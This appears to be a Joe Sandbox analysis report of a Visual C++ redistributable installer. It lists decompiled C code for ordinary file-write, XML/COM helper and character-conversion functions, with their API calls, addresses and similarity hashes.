                                                                          0x0003cf4c
                                                                          0x0003cf53

                                                                          APIs
                                                                          • CloseHandle.KERNEL32(?,00000000,?,00000000,?,0003CEEB,00000000), ref: 0003CF10
                                                                          • CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,0003CEEB,00000000), ref: 0003CF1C
                                                                          • CloseHandle.KERNEL32(0005B508,00000000,?,00000000,?,0003CEEB,00000000), ref: 0003CF29
                                                                          • CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,0003CEEB,00000000), ref: 0003CF36
                                                                          • UnmapViewOfFile.KERNEL32(0005B4D8,00000000,?,0003CEEB,00000000), ref: 0003CF45
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle$FileUnmapView
                                                                          • String ID:
                                                                          • API String ID: 260491571-0
                                                                          • Opcode ID: fb6f8650060d80d92239ccea0c16587f40f9898d82f09cdc04deaf5a4ffff266
                                                                          • Instruction ID: 62cd137334fb73b4d17f1ef4b338185334631e3c42f5e9e3994ea2f72626bfd7
                                                                          • Opcode Fuzzy Hash: fb6f8650060d80d92239ccea0c16587f40f9898d82f09cdc04deaf5a4ffff266
                                                                          • Instruction Fuzzy Hash: A6014B76404B15DFDB316F56D880817FBEAEF50315714C83ED296A2421C771A840DF50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0004D038 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 95%
                                                                          			E0004D038(void* __ebx, signed int __edx, signed int _a4, void* _a8, signed int _a12) {
				signed int _v8;
				long _v12;
				struct _OVERLAPPED* _v16;
				long _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				void* _v52;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t62;
				intOrPtr _t66;
				signed char _t68;
				signed int _t69;
				signed int _t71;
				signed int _t73;
				signed int _t74;
				signed int _t77;
				intOrPtr _t79;
				signed int _t87;
				signed int _t89;
				signed int _t90;
				signed int _t106;
				signed int _t107;
				signed int _t109;
				intOrPtr _t111;
				signed int _t116;
				signed int _t118;
				void* _t119;
				signed int _t120;
				signed int _t121;
				void* _t122;

				_t118 = __edx;
				_t104 = __ebx;
				_t62 =  *0x7a008; // 0xfbf51acb
				_v8 = _t62 ^ _t121;
				_t109 = _a12;
				_v12 = _t109;
				_t120 = _a4;
				_t119 = _a8;
				_v52 = _t119;
				if(_t109 != 0) {
					__eflags = _t119;
					if(_t119 != 0) {
						_push(__ebx);
						_t106 = _t120 >> 6;
						_t118 = (_t120 & 0x0000003f) * 0x30;
						_v32 = _t106;
						_t66 =  *((intOrPtr*)(0x7b158 + _t106 * 4));
						_v48 = _t66;
						_v28 = _t118;
						_t107 =  *((intOrPtr*)(_t66 + _t118 + 0x29));
						__eflags = _t107 - 2;
						if(_t107 == 2) {
							L6:
							_t68 =  !_t109;
							__eflags = _t68 & 0x00000001;
							if((_t68 & 0x00000001) != 0) {
								_t66 = _v48;
								L9:
								__eflags =  *(_t66 + _t118 + 0x28) & 0x00000020;
								if(__eflags != 0) {
									E0004D2C2(_t120, 0, 0, 2);
									_t122 = _t122 + 0x10;
								}
								_t69 = E0004CBDD(_t107, _t118, __eflags, _t120);
								__eflags = _t69;
								if(_t69 == 0) {
									_t111 =  *((intOrPtr*)(0x7b158 + _v32 * 4));
									_t71 = _v28;
									__eflags =  *(_t111 + _t71 + 0x28) & 0x00000080;
									if(( *(_t111 + _t71 + 0x28) & 0x00000080) == 0) {
										_v24 = 0;
										_v20 = 0;
										_v16 = 0;
										_t73 = WriteFile( *(_t111 + _t71 + 0x18), _t119, _v12,  &_v20, 0);
										__eflags = _t73;
										if(_t73 == 0) {
											_v24 = GetLastError();
										}
										_t120 =  &_v24;
										goto L28;
									}
									_t87 = _t107;
									__eflags = _t87;
									if(_t87 == 0) {
										_t89 = E0004CC53( &_v24, _t120, _t119, _v12);
										goto L17;
									}
									_t90 = _t87 - 1;
									__eflags = _t90;
									if(_t90 == 0) {
										_t89 = E0004CE20( &_v24, _t120, _t119, _v12);
										goto L17;
									}
									__eflags = _t90 != 1;
									if(_t90 != 1) {
										goto L34;
									}
									_t89 = E0004CD32( &_v24, _t120, _t119, _v12);
									goto L17;
								} else {
									__eflags = _t107;
									if(_t107 == 0) {
										_t89 = E0004C9BD( &_v24, _t120, _t119, _v12);
										L17:
										L15:
										_t120 = _t89;
										L28:
										_t119 =  &_v44;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t74 = _v40;
										__eflags = _t74;
										if(_t74 != 0) {
											__eflags = _t74 - _v36;
											L40:
											_pop(_t104);
											L41:
											return E0003DE36(_t104, _v8 ^ _t121, _t118, _t119, _t120);
										}
										_t77 = _v44;
										__eflags = _t77;
										if(_t77 == 0) {
											_t119 = _v52;
											L34:
											_t116 = _v28;
											_t79 =  *((intOrPtr*)(0x7b158 + _v32 * 4));
											__eflags =  *(_t79 + _t116 + 0x28) & 0x00000040;
											if(( *(_t79 + _t116 + 0x28) & 0x00000040) == 0) {
												L37:
												 *((intOrPtr*)(E00043E36())) = 0x1c;
												_t81 = E00043E23();
												 *_t81 =  *_t81 & 0x00000000;
												__eflags =  *_t81;
												L38:
												goto L40;
											}
											__eflags =  *_t119 - 0x1a;
											if( *_t119 != 0x1a) {
												goto L37;
											}
											goto L40;
										}
										_t120 = 5;
										__eflags = _t77 - _t120;
										if(_t77 != _t120) {
											_t81 = E00043E00(_t77);
										} else {
											 *((intOrPtr*)(E00043E36())) = 9;
											 *(E00043E23()) = _t120;
										}
										goto L38;
									}
									__eflags = _t107 - 1 - 1;
									if(_t107 - 1 > 1) {
										goto L34;
									}
									_t89 = E0004CB70( &_v24, _t119, _v12);
									goto L15;
								}
							}
							 *(E00043E23()) =  *_t97 & 0x00000000;
							 *((intOrPtr*)(E00043E36())) = 0x16;
							_t81 = E00043D7A();
							goto L38;
						}
						__eflags = _t107 - 1;
						if(_t107 != 1) {
							goto L9;
						}
						goto L6;
					}
					 *(E00043E23()) =  *_t99 & _t119;
					 *((intOrPtr*)(E00043E36())) = 0x16;
					E00043D7A();
					goto L41;
				}
				goto L41;
			}








































                                                                          0x0004d038
                                                                          0x0004d038
                                                                          0x0004d040
                                                                          0x0004d047
                                                                          0x0004d04a
                                                                          0x0004d04d
                                                                          0x0004d051
                                                                          0x0004d055
                                                                          0x0004d058
                                                                          0x0004d05d
                                                                          0x0004d066
                                                                          0x0004d068
                                                                          0x0004d089
                                                                          0x0004d08e
                                                                          0x0004d094
                                                                          0x0004d097
                                                                          0x0004d09a
                                                                          0x0004d0a1
                                                                          0x0004d0a4
                                                                          0x0004d0a7
                                                                          0x0004d0ab
                                                                          0x0004d0ae
                                                                          0x0004d0b5
                                                                          0x0004d0b7
                                                                          0x0004d0b9
                                                                          0x0004d0bb
                                                                          0x0004d0da
                                                                          0x0004d0dd
                                                                          0x0004d0dd
                                                                          0x0004d0e2
                                                                          0x0004d0eb
                                                                          0x0004d0f0
                                                                          0x0004d0f0
                                                                          0x0004d0f4
                                                                          0x0004d0fa
                                                                          0x0004d0fc
                                                                          0x0004d13a
                                                                          0x0004d141
                                                                          0x0004d144
                                                                          0x0004d149
                                                                          0x0004d198
                                                                          0x0004d19b
                                                                          0x0004d19e
                                                                          0x0004d1aa
                                                                          0x0004d1b0
                                                                          0x0004d1b2
                                                                          0x0004d1ba
                                                                          0x0004d1ba
                                                                          0x0004d1bd
                                                                          0x00000000
                                                                          0x0004d1bd
                                                                          0x0004d14e
                                                                          0x0004d14e
                                                                          0x0004d151
                                                                          0x0004d18a
                                                                          0x00000000
                                                                          0x0004d18a
                                                                          0x0004d153
                                                                          0x0004d153
                                                                          0x0004d156
                                                                          0x0004d17a
                                                                          0x00000000
                                                                          0x0004d17a
                                                                          0x0004d158
                                                                          0x0004d15b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004d16a
                                                                          0x00000000
                                                                          0x0004d0fe
                                                                          0x0004d0fe
                                                                          0x0004d100
                                                                          0x0004d12d
                                                                          0x0004d132
                                                                          0x0004d11d
                                                                          0x0004d11d
                                                                          0x0004d1c0
                                                                          0x0004d1c0
                                                                          0x0004d1c3
                                                                          0x0004d1c4
                                                                          0x0004d1c5
                                                                          0x0004d1c6
                                                                          0x0004d1c9
                                                                          0x0004d1cb
                                                                          0x0004d230
                                                                          0x0004d233
                                                                          0x0004d233
                                                                          0x0004d234
                                                                          0x0004d243
                                                                          0x0004d243
                                                                          0x0004d1cd
                                                                          0x0004d1d0
                                                                          0x0004d1d2
                                                                          0x0004d1f8
                                                                          0x0004d1fb
                                                                          0x0004d1fe
                                                                          0x0004d201
                                                                          0x0004d208
                                                                          0x0004d20d
                                                                          0x0004d218
                                                                          0x0004d21d
                                                                          0x0004d223
                                                                          0x0004d228
                                                                          0x0004d228
                                                                          0x0004d22b
                                                                          0x00000000
                                                                          0x0004d22b
                                                                          0x0004d20f
                                                                          0x0004d212
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004d214
                                                                          0x0004d1d6
                                                                          0x0004d1d7
                                                                          0x0004d1d9
                                                                          0x0004d1f0
                                                                          0x0004d1db
                                                                          0x0004d1e0
                                                                          0x0004d1eb
                                                                          0x0004d1eb
                                                                          0x00000000
                                                                          0x0004d1d9
                                                                          0x0004d104
                                                                          0x0004d107
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004d115
                                                                          0x00000000
                                                                          0x0004d11a
                                                                          0x0004d0fc
                                                                          0x0004d0c2
                                                                          0x0004d0ca
                                                                          0x0004d0d0
                                                                          0x00000000
                                                                          0x0004d0d0
                                                                          0x0004d0b0
                                                                          0x0004d0b3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004d0b3
                                                                          0x0004d06f
                                                                          0x0004d076
                                                                          0x0004d07c
                                                                          0x00000000
                                                                          0x0004d081
                                                                          0x00000000

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @Met
                                                                          • API String ID: 0-2381362037
                                                                          • Opcode ID: a54e8a598babc626802e65997ed34a5feda4b02bc639c40a408ab0d812985c23
                                                                          • Instruction ID: 4e469ab3668c05083676855e5bfeab5f22f750a7910b32c3cea6a6aa46f8d8ce
                                                                          • Opcode Fuzzy Hash: a54e8a598babc626802e65997ed34a5feda4b02bc639c40a408ab0d812985c23
                                                                          • Instruction Fuzzy Hash: DB51D3F1E00209ABDB219FA4C945FEE7BF8AF15310F14006AF800A72A2D7749A01CB69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000579CC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 80%
                                                                          			E000579CC(void* __ebx, void* __eflags, intOrPtr* _a4, signed int _a8) {
				signed int _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _v24;
				intOrPtr* _t66;
				signed int _t67;
				signed int _t68;
				intOrPtr* _t71;
				intOrPtr* _t77;
				void* _t79;
				intOrPtr* _t81;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				intOrPtr* _t91;
				signed int _t92;
				signed int _t93;

				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_t90 = E000138D4(0x14, 1);
				if(_t90 != 0) {
					_t77 = _a4;
					_t92 =  *((intOrPtr*)( *_t77 + 0x9c))(_t77,  &_v12, __ebx);
					__eflags = _t92;
					if(_t92 != 0) {
						__eflags = _t92 - 1;
						_t93 =  ==  ? 0 : _t92;
						goto L6;
					} else {
						_t93 = E000121A5(_t90, _v12, _t45);
						__eflags = _t93;
						if(_t93 >= 0) {
							L6:
							__eflags = _t93;
							if(_t93 >= 0) {
								_t93 =  *((intOrPtr*)( *_t77 + 0xa4))(_t77,  &_v16);
								__eflags = _t93;
								if(_t93 >= 0) {
									_t13 = _t90 + 4; // 0x4
									_t93 = E000121A5(_t13, _v16, 0);
									__eflags = _t93;
									if(_t93 >= 0) {
										_t93 = E000533C8(_t77,  &_v20);
										__eflags = _t93;
										if(_t93 >= 0) {
											_t16 = _t90 + 8; // 0x8
											_t93 = E000121A5(_t16, _v20, 0);
											__eflags = _t93;
											if(_t93 >= 0) {
												_t93 =  *((intOrPtr*)( *_t77 + 0x44))(_t77,  &_v24);
												__eflags = _t93;
												if(_t93 >= 0) {
													_t66 = _v24;
													_t67 =  *((intOrPtr*)( *_t66 + 0x38))(_t66,  &_v8);
													__eflags = _t67;
													if(__eflags != 0) {
														L18:
														__eflags = _t67 - 1;
														_t93 =  !=  ? _t67 : 0;
														__eflags = _t93;
														if(_t93 >= 0) {
															_t68 = _a8;
															while(1) {
																__eflags =  *_t68;
																if( *_t68 == 0) {
																	break;
																}
																_t68 =  *_t68 + 0x10;
																__eflags = _t68;
															}
															 *_t68 = _t90;
															_t90 = 0;
															__eflags = 0;
														}
													} else {
														_t22 = _t90 + 0xc; // 0xc
														_t79 = _t22;
														while(1) {
															_t93 = E000578C5(_t79, __eflags, _v8, _t79);
															__eflags = _t93;
															if(_t93 < 0) {
																goto L23;
															}
															_t86 = _v8;
															__eflags = _t86;
															if(_t86 != 0) {
																 *((intOrPtr*)( *_t86 + 8))(_t86);
																_t26 =  &_v8;
																 *_t26 = _v8 & 0x00000000;
																__eflags =  *_t26;
															}
															_t71 = _v24;
															_t67 =  *((intOrPtr*)( *_t71 + 0x38))(_t71,  &_v8);
															__eflags = _t67;
															if(__eflags == 0) {
																continue;
															} else {
																goto L18;
															}
															goto L23;
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
					L23:
				} else {
					_t93 = 0x8007000e;
					E000137D3(_t43, "atomutil.cpp", 0x397, 0x8007000e);
				}
				E00056A7C(_t90);
				_t91 = __imp__#6;
				if(_v12 != 0) {
					 *_t91(_v12);
				}
				if(_v16 != 0) {
					 *_t91(_v16);
				}
				if(_v20 != 0) {
					 *_t91(_v20);
				}
				_t81 = _v24;
				if(_t81 != 0) {
					 *((intOrPtr*)( *_t81 + 8))(_t81);
				}
				_t82 = _v8;
				if(_t82 != 0) {
					 *((intOrPtr*)( *_t82 + 8))(_t82);
				}
				return _t93;
			}





















                                                                          0x000579da
                                                                          0x000579dd
                                                                          0x000579e0
                                                                          0x000579e3
                                                                          0x000579e6
                                                                          0x000579ee
                                                                          0x000579f2
                                                                          0x00057a0f
                                                                          0x00057a1f
                                                                          0x00057a21
                                                                          0x00057a23
                                                                          0x00057a3d
                                                                          0x00057a40
                                                                          0x00000000
                                                                          0x00057a25
                                                                          0x00057a2f
                                                                          0x00057a31
                                                                          0x00057a33
                                                                          0x00057a43
                                                                          0x00057a43
                                                                          0x00057a45
                                                                          0x00057a58
                                                                          0x00057a5a
                                                                          0x00057a5c
                                                                          0x00057a67
                                                                          0x00057a70
                                                                          0x00057a72
                                                                          0x00057a74
                                                                          0x00057a84
                                                                          0x00057a86
                                                                          0x00057a88
                                                                          0x00057a93
                                                                          0x00057a9c
                                                                          0x00057a9e
                                                                          0x00057aa0
                                                                          0x00057aac
                                                                          0x00057aae
                                                                          0x00057ab0
                                                                          0x00057ab2
                                                                          0x00057abc
                                                                          0x00057abf
                                                                          0x00057ac1
                                                                          0x00057af7
                                                                          0x00057af9
                                                                          0x00057afc
                                                                          0x00057aff
                                                                          0x00057b01
                                                                          0x00057b03
                                                                          0x00057b0d
                                                                          0x00057b0d
                                                                          0x00057b10
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00057b0a
                                                                          0x00057b0a
                                                                          0x00057b0a
                                                                          0x00057b12
                                                                          0x00057b14
                                                                          0x00057b14
                                                                          0x00057b14
                                                                          0x00057ac3
                                                                          0x00057ac3
                                                                          0x00057ac3
                                                                          0x00057ac6
                                                                          0x00057acf
                                                                          0x00057ad1
                                                                          0x00057ad3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00057ad5
                                                                          0x00057ad8
                                                                          0x00057ada
                                                                          0x00057adf
                                                                          0x00057ae2
                                                                          0x00057ae2
                                                                          0x00057ae2
                                                                          0x00057ae2
                                                                          0x00057ae6
                                                                          0x00057af0
                                                                          0x00057af3
                                                                          0x00057af5
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00057af5
                                                                          0x00057ac6
                                                                          0x00057ac1
                                                                          0x00057ab0
                                                                          0x00057aa0
                                                                          0x00057a88
                                                                          0x00057a74
                                                                          0x00057a5c
                                                                          0x00057a45
                                                                          0x00057a33
                                                                          0x00057b16
                                                                          0x000579f4
                                                                          0x000579f4
                                                                          0x00057a04
                                                                          0x00057a04
                                                                          0x00057b18
                                                                          0x00057b21
                                                                          0x00057b27
                                                                          0x00057b2c
                                                                          0x00057b2c
                                                                          0x00057b32
                                                                          0x00057b37
                                                                          0x00057b37
                                                                          0x00057b3d
                                                                          0x00057b42
                                                                          0x00057b42
                                                                          0x00057b44
                                                                          0x00057b49
                                                                          0x00057b4e
                                                                          0x00057b4e
                                                                          0x00057b51
                                                                          0x00057b56
                                                                          0x00057b5b
                                                                          0x00057b5b
                                                                          0x00057b65

                                                                          APIs
                                                                            • Part of subcall function 000138D4: GetProcessHeap.KERNEL32(?,000001C7,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138E5
                                                                            • Part of subcall function 000138D4: RtlAllocateHeap.NTDLL(00000000,?,00012284,000001C7,00000001,80004005,8007139F,?,?,0005015F,8007139F,?,00000000,00000000,8007139F), ref: 000138EC
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00057B2C
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00057B37
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00057B42
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: FreeString$Heap$AllocateProcess
                                                                          • String ID: atomutil.cpp
                                                                          • API String ID: 2724874077-4059165915
                                                                          • Opcode ID: ea7f162c0ce3a68d97b51346417578a2333452ed93b173be89d2efee950ee09c
                                                                          • Instruction ID: c5d13d1bf221804162208a8ddd77f4f654218d5ce1e3baa6f7b77ac1fc8e17f2
                                                                          • Opcode Fuzzy Hash: ea7f162c0ce3a68d97b51346417578a2333452ed93b173be89d2efee950ee09c
                                                                          • Instruction Fuzzy Hash: 4251B231E0422AAFEB21DF64D854FAFB7B8AF44715F010564ED09AB211DB31DE04DBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000535A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122memoryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 58%
                                                                          			E000535A4(intOrPtr _a4, signed char _a8, intOrPtr* _a12) {
				void* _v8;
				void* _v12;
				char _v16;
				intOrPtr _v24;
				char _v32;
				short _t29;
				void* _t31;
				intOrPtr* _t48;
				intOrPtr* _t55;
				intOrPtr* _t56;
				void* _t62;

				_t55 = 0;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				__imp__#8( &_v32);
				_t29 = 8;
				_v32 = _t29;
				__imp__#2(_a4);
				_v24 = _t29;
				if(_t29 != 0) {
					_t31 = E00052F23(0,  &_v8, 0);
					_t55 = _v8;
					_t62 =  ==  ? 0x80004005 : _t31;
					if(_t62 < 0) {
						goto L13;
					}
					if((_a8 & 0x00000001) == 0) {
						L5:
						_t62 =  *((intOrPtr*)( *_t55 + 0x110))(_t55, 0);
						if(_t62 >= 0) {
							_t62 =  *((intOrPtr*)( *_t55 + 0x118))(_t55, 0);
							if(_t62 >= 0) {
								 *((intOrPtr*)( *_t55 + 0xfc))(_t55, 0);
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t62 =  ==  ? 0x8007006e :  *((intOrPtr*)( *_t55 + 0xe8))(_t55,  &_v16);
								if(_t62 >= 0) {
									_t48 = _a12;
									if(_t48 != 0) {
										 *_t48 = _t55;
										_t55 = 0;
									}
									_t62 = 0;
								} else {
									_push( &_v12);
									_push(_t55);
									if( *((intOrPtr*)( *_t55 + 0xf0))() == 0) {
										E00052E85( &_v12, _v12);
									}
								}
							}
						}
						goto L13;
					}
					_t62 =  *((intOrPtr*)( *_t55 + 0x120))(_t55, 0xffffffff);
					if(_t62 < 0) {
						goto L13;
					}
					goto L5;
				} else {
					_t62 = 0x8007000e;
					E000137D3(_t29, "xmlutil.cpp", 0x16a, 0x8007000e);
					L13:
					__imp__#9( &_v32);
					if(_t55 != 0) {
						 *((intOrPtr*)( *_t55 + 8))(_t55);
					}
					_t56 = _v12;
					if(_t56 != 0) {
						 *((intOrPtr*)( *_t56 + 8))(_t56);
					}
					return _t62;
				}
			}














                                                                          0x000535b2
                                                                          0x000535b4
                                                                          0x000535b8
                                                                          0x000535bb
                                                                          0x000535be
                                                                          0x000535c6
                                                                          0x000535ca
                                                                          0x000535ce
                                                                          0x000535d4
                                                                          0x000535d9
                                                                          0x000535fb
                                                                          0x00053600
                                                                          0x0005360d
                                                                          0x00053612
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0005361c
                                                                          0x0005362f
                                                                          0x00053639
                                                                          0x0005363d
                                                                          0x00053649
                                                                          0x0005364d
                                                                          0x00053653
                                                                          0x00053668
                                                                          0x00053669
                                                                          0x0005366a
                                                                          0x0005366b
                                                                          0x0005367c
                                                                          0x00053681
                                                                          0x0005369e
                                                                          0x000536a3
                                                                          0x000536a5
                                                                          0x000536a7
                                                                          0x000536a7
                                                                          0x000536a9
                                                                          0x00053683
                                                                          0x00053688
                                                                          0x00053689
                                                                          0x00053692
                                                                          0x00053697
                                                                          0x00053697
                                                                          0x00053692
                                                                          0x00053681
                                                                          0x0005364d
                                                                          0x00000000
                                                                          0x0005363d
                                                                          0x00053629
                                                                          0x0005362d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000535db
                                                                          0x000535db
                                                                          0x000535eb
                                                                          0x000536ab
                                                                          0x000536af
                                                                          0x000536b7
                                                                          0x000536bc
                                                                          0x000536bc
                                                                          0x000536bf
                                                                          0x000536c4
                                                                          0x000536c9
                                                                          0x000536c9
                                                                          0x000536d4
                                                                          0x000536d4

                                                                          APIs
                                                                          • VariantInit.OLEAUT32(000002C0), ref: 000535BE
                                                                          • SysAllocString.OLEAUT32(?), ref: 000535CE
                                                                          • VariantClear.OLEAUT32(?), ref: 000536AF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$AllocClearInitString
                                                                          • String ID: xmlutil.cpp
                                                                          • API String ID: 2213243845-1270936966
                                                                          • Opcode ID: 9d83ef5c070a589ac7098e1baa87136cac07ca7ce6f4bf0ff4269b6fb362db67
                                                                          • Instruction ID: 4f8c0d38b65dd710870d70ff4a644f3780355287ac71ca76bb1273fb3d33bb96
                                                                          • Opcode Fuzzy Hash: 9d83ef5c070a589ac7098e1baa87136cac07ca7ce6f4bf0ff4269b6fb362db67
                                                                          • Instruction Fuzzy Hash: F7418375900626AFCB119FA5C888EAFBBF8AF45751F0181A8FC05EB311D735DE048BA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000465D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 88%
                                                                          			E000465D0(int* _a4, char* _a8, int _a12, short _a16, intOrPtr _a20) {
				int _v8;
				char _v12;
				intOrPtr _v20;
				char _v24;
				void* __ebx;
				void* __edi;
				signed int* _t21;
				intOrPtr _t23;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t31;
				char _t32;
				int* _t33;
				intOrPtr* _t35;
				signed int* _t37;
				char* _t39;
				int _t43;
				void* _t46;
				int _t47;

				_t39 = _a8;
				_t47 = _a12;
				if(_t39 == 0 && _t47 != 0) {
					_t37 = _a4;
					if(_t37 != 0) {
						 *_t37 =  *_t37 & 0x00000000;
					}
					return 0;
				}
				_t21 = _a4;
				if(_t21 != 0) {
					 *_t21 =  *_t21 | 0xffffffff;
				}
				if(_t47 <= 0x7fffffff) {
					E000419B7(_t39,  &_v24, _t46, _a20);
					_t23 = _v20;
					if( *((intOrPtr*)(_t23 + 0xa8)) != 0) {
						_v8 = 0;
						_t43 = WideCharToMultiByte( *(_t23 + 8), 0,  &_a16, 1, _t39, _t47, 0,  &_v8);
						if(_t43 == 0) {
							if(GetLastError() != 0x7a) {
								L14:
								_t26 = E00043E36();
								_push(0x2a);
								_pop(0);
								 *_t26 = 0;
								L15:
								if(_v12 != 0) {
									 *(_v24 + 0x350) =  *(_v24 + 0x350) & 0xfffffffd;
								}
								goto L17;
							}
							if(_t39 != 0 && _t47 != 0) {
								E0003F670(_t47, _t39, 0, _t47);
							}
							L32:
							_t28 = E00043E36();
							_push(0x22);
							_pop(0);
							 *_t28 = 0;
							E00043D7A();
							goto L15;
						}
						if(_v8 != 0) {
							goto L14;
						}
						_t31 = _a4;
						if(_t31 != 0) {
							 *_t31 = _t43;
						}
						goto L15;
					}
					_t32 = _a16;
					if(_t32 <= 0xff) {
						if(_t39 == 0) {
							L22:
							_t33 = _a4;
							if(_t33 != 0) {
								 *_t33 = 1;
							}
							goto L15;
						}
						if(_t47 == 0) {
							goto L32;
						}
						 *_t39 = _t32;
						goto L22;
					}
					if(_t39 != 0 && _t47 != 0) {
						E0003F670(_t47, _t39, 0, _t47);
					}
					goto L14;
				} else {
					_t35 = E00043E36();
					_push(0x16);
					_pop(0);
					 *_t35 = 0;
					E00043D7A();
					L17:
					return 0;
				}
			}






















                                                                          0x000465d9
                                                                          0x000465dd
                                                                          0x000465e2
                                                                          0x000465e8
                                                                          0x000465ed
                                                                          0x000465ef
                                                                          0x000465ef
                                                                          0x00000000
                                                                          0x000465f2
                                                                          0x000465f6
                                                                          0x000465fb
                                                                          0x000465fd
                                                                          0x000465fd
                                                                          0x00046607
                                                                          0x00046620
                                                                          0x00046625
                                                                          0x00046630
                                                                          0x00046692
                                                                          0x000466a9
                                                                          0x000466ad
                                                                          0x000466c8
                                                                          0x00046653
                                                                          0x00046653
                                                                          0x00046658
                                                                          0x0004665a
                                                                          0x0004665b
                                                                          0x0004665d
                                                                          0x00046661
                                                                          0x00046666
                                                                          0x00046666
                                                                          0x00000000
                                                                          0x00046661
                                                                          0x000466cc
                                                                          0x000466d5
                                                                          0x000466da
                                                                          0x000466dd
                                                                          0x000466dd
                                                                          0x000466e2
                                                                          0x000466e4
                                                                          0x000466e5
                                                                          0x000466e7
                                                                          0x00000000
                                                                          0x000466e7
                                                                          0x000466b2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000466b4
                                                                          0x000466b9
                                                                          0x000466bb
                                                                          0x000466bb
                                                                          0x00000000
                                                                          0x000466b9
                                                                          0x00046632
